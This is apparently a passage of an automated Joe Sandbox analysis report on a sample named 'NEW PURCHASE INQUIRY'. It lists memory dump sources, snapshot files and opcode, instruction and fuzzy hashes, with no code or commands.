                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 669f6d2615db1dff3756a5568beae02e61e4e732ba53d52afe84a6c32bf443aa
                                        • Instruction ID: 660aef013cc134b2a8057678ee02c688d746e64b51a1cca8f7fbb1abf0b96a75
                                        • Opcode Fuzzy Hash: 669f6d2615db1dff3756a5568beae02e61e4e732ba53d52afe84a6c32bf443aa
                                        • Instruction Fuzzy Hash: 1FE01A34D04108EFC744DF99D540AACBBB8EB4C300F20C0A9A81857341CA329E06CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2204677410.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b072de1244d4c9c35adff01bc74942a1fdd6c9b2d533573fdf02aa8d8b05cbe6
                                        • Instruction ID: 5ef051828ad86b144b026fe6ff18bab5d67723873f5076afeec2d92a61dc1919
                                        • Opcode Fuzzy Hash: b072de1244d4c9c35adff01bc74942a1fdd6c9b2d533573fdf02aa8d8b05cbe6
                                        • Instruction Fuzzy Hash: 20E0EC34909108DFCB44DF95D9419ACBBB9EB49315F1091ADD80827352CA329E56DB85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202621764.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6830000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d31470280c8c3b073ed77fc717bcb053b3b80818855de6587211512a625cb84
                                        • Instruction ID: 0d4ee6d057c43374ce07c7c84b677827cdf9f0fc79d175d9b682c87024a1916d
                                        • Opcode Fuzzy Hash: 5d31470280c8c3b073ed77fc717bcb053b3b80818855de6587211512a625cb84
                                        • Instruction Fuzzy Hash: C3E0C27184111CEFC740EFB4C90099E77E8EF08201F4045A5D514A3120EE714E18DBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202621764.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6830000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6d4faa9daf617b70963a12b4d0914619f1e9252a60c0de87f0d5a788e2b4193
                                        • Instruction ID: 89c95ea991a86d63b807a98b5f36ceb348ad77c51cd569ccbccef5301fbf35df
                                        • Opcode Fuzzy Hash: b6d4faa9daf617b70963a12b4d0914619f1e9252a60c0de87f0d5a788e2b4193
                                        • Instruction Fuzzy Hash: 9CE01270D1521CEFC780DFF8D94569CBBF4EB04201F5041A9D909E3350E6305E54CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa1f1cfa786a4f737b9635d3cb9683ba1abbc9f59bfbefd2af2b9d482305596a
                                        • Instruction ID: 53fe6ccf745d8d361106b91d53604995f16b73c1cae9d3fcfdd33c9a52e69026
                                        • Opcode Fuzzy Hash: aa1f1cfa786a4f737b9635d3cb9683ba1abbc9f59bfbefd2af2b9d482305596a
                                        • Instruction Fuzzy Hash: B7E0C23184111CEFC740EFB5890499E77E8EF08201F1044A5D51493120EE314A18DBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2731dd8198bae5db5d6efc1db3cc87b9b90bb7f6bcfcaa964d564c945eb1b9c6
                                        • Instruction ID: c56483a0930eec21eea8c1992dc068d8f0ddc5a05663783a3e0e1539c1d414ae
                                        • Opcode Fuzzy Hash: 2731dd8198bae5db5d6efc1db3cc87b9b90bb7f6bcfcaa964d564c945eb1b9c6
                                        • Instruction Fuzzy Hash: 2DE0C274908108EFC704DF94D9809ACBBB8EF45301F20C0DCD8082B351CA329E0ACB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd22974465d5e56fda5888df2f6b20da599b05a98d1ab175737905cdb850e84f
                                        • Instruction ID: 4c3817d0e9fd9d654de55c2603a7b42bd4064002b2a62302fb1eacd8119b6b3f
                                        • Opcode Fuzzy Hash: fd22974465d5e56fda5888df2f6b20da599b05a98d1ab175737905cdb850e84f
                                        • Instruction Fuzzy Hash: 22E01270D0020CEFCB04DFA9D544A9CBBB0EB48301F1080E9E818A7350D7359A49CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d32ade105c2ab8c5b3d9f5d40a72361175264a369950fd08e549c5aac2b8af84
                                        • Instruction ID: 25d361642fb035f94fa74b574fd4d704b8f36f14b8ffe1cce28ddd62c5f0c14c
                                        • Opcode Fuzzy Hash: d32ade105c2ab8c5b3d9f5d40a72361175264a369950fd08e549c5aac2b8af84
                                        • Instruction Fuzzy Hash: 35F09270D151299EEB64DF10CD95AE9BBB5EB84300F0450EAE50DB2260DB396F84EF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd5da08ddb6a7d4bfb55d2beafb4887e748c01a5dbae1e783a121e1eafcf6a26
                                        • Instruction ID: 3a6b7c759216c226aa5065f92864095ff681e731402784ea1b447371046cc114
                                        • Opcode Fuzzy Hash: dd5da08ddb6a7d4bfb55d2beafb4887e748c01a5dbae1e783a121e1eafcf6a26
                                        • Instruction Fuzzy Hash: 2CE0C23184111DEFCB41FFB58900A9E77E8EF48211F0044A5D50497120EE314A18DBA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 714f5baf4d4cbe85af1b92308c80f713cedcb94b11f0696d6ca891d0270a54f8
                                        • Instruction ID: 8d7b0c57bc536669179bddb0630266cb37f01a3707036f0ba09692c2c5cd2650
                                        • Opcode Fuzzy Hash: 714f5baf4d4cbe85af1b92308c80f713cedcb94b11f0696d6ca891d0270a54f8
                                        • Instruction Fuzzy Hash: E0E06D70A012589FC764AF24D8957AD7771EB47304F0090EA914AA3340CA302EC5CF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1eff02fed7eff9427268dfbe53fe9b8dcb1c1775b16d2c52018ef17fa806f724
                                        • Instruction ID: 34fb7a91c71895b00c15bce11de00b04b9d0b1c04635b99ddc9f1a25db80f146
                                        • Opcode Fuzzy Hash: 1eff02fed7eff9427268dfbe53fe9b8dcb1c1775b16d2c52018ef17fa806f724
                                        • Instruction Fuzzy Hash: 4BD05E340097886FD3029B28D848CC27FB9EB0B23130581E6F145CF133C221A950CBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2661d21ff24f9bf5d2753a28c9e7515684ee9bf153b182483a5ecce69f5a0d65
                                        • Instruction ID: f36cdcab918d7de09b29cb3a9299139ab03b5d88c126a2380ffcecb6ded2ae8b
                                        • Opcode Fuzzy Hash: 2661d21ff24f9bf5d2753a28c9e7515684ee9bf153b182483a5ecce69f5a0d65
                                        • Instruction Fuzzy Hash: F0E0C230A00208EFCB44DFB4E904B6E77FADB84304F1082A8D905D7200DA356F009790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a0c8ddd0629eb5ab93edf0b97b26f11ea4bd1877e6d7f0a4db95934b7dca454
                                        • Instruction ID: 4acefb5fd6bddd37d4f9608260545258c9d6b8a0aed215e0facd71fbcc573643
                                        • Opcode Fuzzy Hash: 4a0c8ddd0629eb5ab93edf0b97b26f11ea4bd1877e6d7f0a4db95934b7dca454
                                        • Instruction Fuzzy Hash: 56D0A730509118DFC744DB95D940EB9B7BCDB45315F1090DCA80D67351CA739D01DB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a7f252ab3cc8ac5defeb708551a69bacfb02d7caa95cbbf0763ae5ef0cebffe
                                        • Instruction ID: a3bc94682e022d3bc20a55784dc69344d80b85a031267bfbd7df8bc244fb254e
                                        • Opcode Fuzzy Hash: 5a7f252ab3cc8ac5defeb708551a69bacfb02d7caa95cbbf0763ae5ef0cebffe
                                        • Instruction Fuzzy Hash: 02E0E270921219EFCB59EFB8A54469DBBB4AB04202F6041B9D908A6250EB729A94DB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a26f18eb084b200b0724d21428c9a1bf0fea41045b7b3de233822e9e903ed617
                                        • Instruction ID: 9513b4536eed18e655f9730dea2995eb7058004d27a5518590e824341c3b9f41
                                        • Opcode Fuzzy Hash: a26f18eb084b200b0724d21428c9a1bf0fea41045b7b3de233822e9e903ed617
                                        • Instruction Fuzzy Hash: 54E01235A0020CEFCB84DFA4E50075DB7F9DB44304F1081AAD90DD7345DA716F059791
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aab048ce4f8dfdc6cff3e9e5471d132622c2e4a49e13556c5bd0932c18d63c0d
                                        • Instruction ID: 82b3856c34c1ccf94aed7bf8b2a92ef93b6e02172f085bc7de1b438aabee1d90
                                        • Opcode Fuzzy Hash: aab048ce4f8dfdc6cff3e9e5471d132622c2e4a49e13556c5bd0932c18d63c0d
                                        • Instruction Fuzzy Hash: CDE0E5309062198FC760AF64D8597CDBBB2EB48305F1090A9A20AA3355DB301E81CF42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22a6604f7c1789f7e9b7f989b4ee9c1385c8e6b7df2a7ba9cc1cd60035e50b83
                                        • Instruction ID: 406de7567a8ee51599e5ad23719c99c2a0dd84b5080e72213d7b44d26beb1898
                                        • Opcode Fuzzy Hash: 22a6604f7c1789f7e9b7f989b4ee9c1385c8e6b7df2a7ba9cc1cd60035e50b83
                                        • Instruction Fuzzy Hash: 7CE0E574A051188FCB60EF24D818ADDB7B1FB4A315F1091A9E54AA7390CB752E85CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 623a6b1854043da9916c58c91ae7c58b3427b6d9a8de577f4b4134e9daceffc2
                                        • Instruction ID: 289d8756d2e6a276e1337cf17219bda1bc761f295787cebaf275917017cda950
                                        • Opcode Fuzzy Hash: 623a6b1854043da9916c58c91ae7c58b3427b6d9a8de577f4b4134e9daceffc2
                                        • Instruction Fuzzy Hash: 74E01A30A002598FCB20EF60D85879EB7F2EB89305F1490AAD60AA7345CB301E84CF42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9760180c4f5d512aea05fd4214d027f5a798e41814b2bfbbb9d8311e2d9ab483
                                        • Instruction ID: 7c083c89f439984dcea8acc8e2fd751138c8a34d5a37407e49f6e609a7d90df1
                                        • Opcode Fuzzy Hash: 9760180c4f5d512aea05fd4214d027f5a798e41814b2bfbbb9d8311e2d9ab483
                                        • Instruction Fuzzy Hash: EDE01A70A40158CFCB20EF60D8997DDB7B2EB89301F0080A9D64AA7340CB711E85CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa271aef25452d58d7567d57732bb5beee46270c680a26c326ce901c5ab882d1
                                        • Instruction ID: 66ca797fb1847a95af0a5a07ff0b181a507f4a70bf6f9e2a43add1cf7ce6adb4
                                        • Opcode Fuzzy Hash: aa271aef25452d58d7567d57732bb5beee46270c680a26c326ce901c5ab882d1
                                        • Instruction Fuzzy Hash: 8AE0E534A002598BEBA0EF20D895BADB7B2EB89300F10C4A9A10AB3340CA355EC5CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: de00061c28baaa5101d38311a0e3175dd2f1ed1f357a78b679e11ab3268dbbab
                                        • Instruction ID: 4d241daf087af0e766eab82cf9f6a0067b7fa0a4eee43172017328d3f2464984
                                        • Opcode Fuzzy Hash: de00061c28baaa5101d38311a0e3175dd2f1ed1f357a78b679e11ab3268dbbab
                                        • Instruction Fuzzy Hash: 98E01A38A12118CFEB60EF64D864B9D77B2FB48314F1041A9D10AA3345CB751EC4CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f27eb0554f096c0a5abf32176f78130c2d39832b3fd723497a37f60b2a7fce1d
                                        • Instruction ID: f0fd561e58073df0fe5728281c0ea73fdb49a0be781ffdd340780680aa07b2ab
                                        • Opcode Fuzzy Hash: f27eb0554f096c0a5abf32176f78130c2d39832b3fd723497a37f60b2a7fce1d
                                        • Instruction Fuzzy Hash: 4FE01A30A01119CBE7A4EF20D855BADB7B2EB4A304F1081A9D10AA3340CA311EC4CF21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 78eafb386d77328316c126f9607b423778e91932a7052d3ecbe13b9e47e12c2a
                                        • Instruction ID: 901a60c29ec312ecff3deaa7852955b9bb4282d94afdd94ba85f1c26f18dd322
                                        • Opcode Fuzzy Hash: 78eafb386d77328316c126f9607b423778e91932a7052d3ecbe13b9e47e12c2a
                                        • Instruction Fuzzy Hash: 78E0E27920010CAFDB50DF94C884FCA37B9EF8A300F009165A60AAB245CB30AE008BA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8ba5a39c1382268f56a33049709330f7b48b4f37814020b0d14d4de2550664d
                                        • Instruction ID: 426afc4c1df0199e56d31835c97b73191323022fa4973ebe02bdcd1c6cf23ebb
                                        • Opcode Fuzzy Hash: f8ba5a39c1382268f56a33049709330f7b48b4f37814020b0d14d4de2550664d
                                        • Instruction Fuzzy Hash: 42E0E234A0414ACFDB40AFD8D464A9E73B2FB4A309F10D124D202A7648CB34AD06CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30200ea4ecc4d57e60377b99d5d65753fbada2088ea0ee387f77d4586f3e3586
                                        • Instruction ID: 34b944e29dc2a1b77b50b6b59f69eaba57a764a75138f04d09aa4f6ebee019c6
                                        • Opcode Fuzzy Hash: 30200ea4ecc4d57e60377b99d5d65753fbada2088ea0ee387f77d4586f3e3586
                                        • Instruction Fuzzy Hash: D4E09274A061588FDBA0DF68C95479DB7F2FB49304F0081EAD609A3384CB305E858F41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32e23238adfd16fe8d162b5984182bf0535c342fbc9f3504fe015157a548c1ad
                                        • Instruction ID: 7de1397402b44892604deee48ccc5745100292596db8b089ae74b0eb3e8ed6bc
                                        • Opcode Fuzzy Hash: 32e23238adfd16fe8d162b5984182bf0535c342fbc9f3504fe015157a548c1ad
                                        • Instruction Fuzzy Hash: 1AD0A7715063918FC712CB24D540CD17F74AE2720431641C3E1818F533C3109900DB21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9457e58cb19ac07d7bf0360378f678204cb89423686c1bb415672857a299eb03
                                        • Instruction ID: 4b16af83aa5f8d67a4ebe163a10c9a2e68a47cc244ec149e47ccbfea9ffd8f9d
                                        • Opcode Fuzzy Hash: 9457e58cb19ac07d7bf0360378f678204cb89423686c1bb415672857a299eb03
                                        • Instruction Fuzzy Hash: 1BD05E70E0415CCBCB10DFA4D844B9E73B1FB45300F10A2699105B3344CB345D458F66
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 26924d346936215d4c18e5f2c33bfa6ee608aab5ca23247e141a323b3aae0e86
                                        • Instruction ID: 644ebe632f7594b20eafcc5694adb5fbed8833e308230f6a6ffa5481415924d8
                                        • Opcode Fuzzy Hash: 26924d346936215d4c18e5f2c33bfa6ee608aab5ca23247e141a323b3aae0e86
                                        • Instruction Fuzzy Hash: 9DC08C2800E3D32FDB43663C8C244A76BB59DC224034C80A2B4C0CB083C608490143A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76179a193970d1c82a9c3d230cd1a6104c99495fce7c7662c69cf86620e8bc9a
                                        • Instruction ID: 0be46b67ad2b761cd1106090b5704f71215676bdc3a9700396e08f42faab4455
                                        • Opcode Fuzzy Hash: 76179a193970d1c82a9c3d230cd1a6104c99495fce7c7662c69cf86620e8bc9a
                                        • Instruction Fuzzy Hash: 7ED0A930604104DFEB40AF68E88D3AEB772EB86305F249039E113A7285CB3A4C80CB02
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2204677410.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ccc36038201130c171c1302c4db10440c39b73f2bb9a25e6fae83eec4229555
                                        • Instruction ID: a1f7609393daf57e38691725f9bc70bd01ee6151e8cc8a4f5ca1caadb2c680cf
                                        • Opcode Fuzzy Hash: 6ccc36038201130c171c1302c4db10440c39b73f2bb9a25e6fae83eec4229555
                                        • Instruction Fuzzy Hash: 96D022303080088FE300AF88C0543A732BAFB88304F008058A20AA378ACB384F42CF82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94be4e6787f9279e376fef83456bab7213d646320ce838b2347502ed94168b69
                                        • Instruction ID: 4e93903bbd7c537b7e22570aaab8a6940e72e098298ab6e25eae2e744a1ea521
                                        • Opcode Fuzzy Hash: 94be4e6787f9279e376fef83456bab7213d646320ce838b2347502ed94168b69
                                        • Instruction Fuzzy Hash: 0ED0A7741043405FC311DB10C410911FBA2DF96204724C89EACC687242C7339C13DB01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87d6d20b8c976c3e9160e2893857718202577a1be646f0bc39fde80e3071e8d7
                                        • Instruction ID: 17316a1587d9d18a4415aa6396512ec7654fa88ee07de34dfa4f2f84c8fe37f4
                                        • Opcode Fuzzy Hash: 87d6d20b8c976c3e9160e2893857718202577a1be646f0bc39fde80e3071e8d7
                                        • Instruction Fuzzy Hash: 3DC01236E00008CB8B50EFD8E8408CDB3B0FF94321B008022E620A7209C6306922CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                        • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                        • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                        • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 718612bcecd5b84048b25cba8eff8d673ffa7210de4daeb82ca972896f22f340
                                        • Instruction ID: 4e0cdb31eb182def231031c165975c312915b68b8f0c5a3859940c96a859027f
                                        • Opcode Fuzzy Hash: 718612bcecd5b84048b25cba8eff8d673ffa7210de4daeb82ca972896f22f340
                                        • Instruction Fuzzy Hash: 16B09236000208EB86009AA4E804855BB69AB99600B40C029BA09061168B33A822DB94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202621764.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6830000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85612d1f865585285476d052dd924aac86ed2e1da5cf5316350bba360378daa3
                                        • Instruction ID: 287be08bc2e3da52c19114240c089247ad6853e91e322485b91d47825a86feac
                                        • Opcode Fuzzy Hash: 85612d1f865585285476d052dd924aac86ed2e1da5cf5316350bba360378daa3
                                        • Instruction Fuzzy Hash: D4C048B4D08328CFEBA0CF24DC80BCDBAF4BB05308F0011EAA808B2200D7300A808F41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TJoq$$jq$$jq$]B
                                        • API String ID: 0-2250878709
                                        • Opcode ID: 14915754ce90ad3264e97b3fa7cfb0a3423e7ddd33d962e28a82baa4f80fb501
                                        • Instruction ID: bd1a4afd7fae5990fb2234a0cf11077336bdd741bcec1c2321ec8666a807f041
                                        • Opcode Fuzzy Hash: 14915754ce90ad3264e97b3fa7cfb0a3423e7ddd33d962e28a82baa4f80fb501
